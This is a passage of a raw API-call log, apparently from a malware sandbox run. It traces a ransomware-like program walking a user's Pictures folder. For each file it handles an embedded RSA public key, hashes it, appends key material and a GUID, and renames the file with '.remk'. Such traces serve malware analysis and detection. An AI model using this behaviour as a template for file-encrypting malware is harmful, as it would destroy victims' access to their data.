dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.699] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.700] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd2fe, lpOverlapped=0x0) returned 1 [0236.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.702] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.703] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.703] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.703] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.703] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.703] GetLastError () returned 0x0 [0236.703] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.703] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.703] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.703] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.703] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.704] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.704] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd2fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.705] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.705] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.705] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.705] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.705] CloseHandle (hObject=0x640) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.707] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ku5zMZBRK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ku5zmzbrk.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ku5zMZBRK.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ku5zmzbrk.png.remk")) returned 1 [0236.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.708] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.710] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59434de0, ftCreationTime.dwHighDateTime=0x1d5e203, ftLastAccessTime.dwLowDateTime=0x24f4c140, ftLastAccessTime.dwHighDateTime=0x1d5d9ac, ftLastWriteTime.dwLowDateTime=0x24f4c140, ftLastWriteTime.dwHighDateTime=0x1d5d9ac, nFileSizeHigh=0x0, nFileSizeLow=0x141f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M3CaFNSYagYb6MmIK-.bmp", cAlternateFileName="M3CAFN~1.BMP")) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.710] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\M3CaFNSYagYb6MmIK-.bmp") returned=".bmp" [0236.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\M3CaFNSYagYb6MmIK-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\m3cafnsyagyb6mmik-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.711] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=82418) returned 1 [0236.711] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.713] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x141cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.713] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.715] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.715] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x141f2, lpOverlapped=0x0) returned 1 [0236.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.717] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.718] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.718] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.718] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.718] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.718] GetLastError () returned 0x0 [0236.718] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.718] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.718] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.718] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.719] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x141f0) returned 0x37cf820 [0236.719] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cee20 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cee68 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc870 [0236.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc858 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.721] GetCurrentThreadId () returned 0x314 [0236.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6060 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.722] GetCurrentThreadId () returned 0x314 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8a0 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.724] HeapFree (in: hHeap=0x630000, 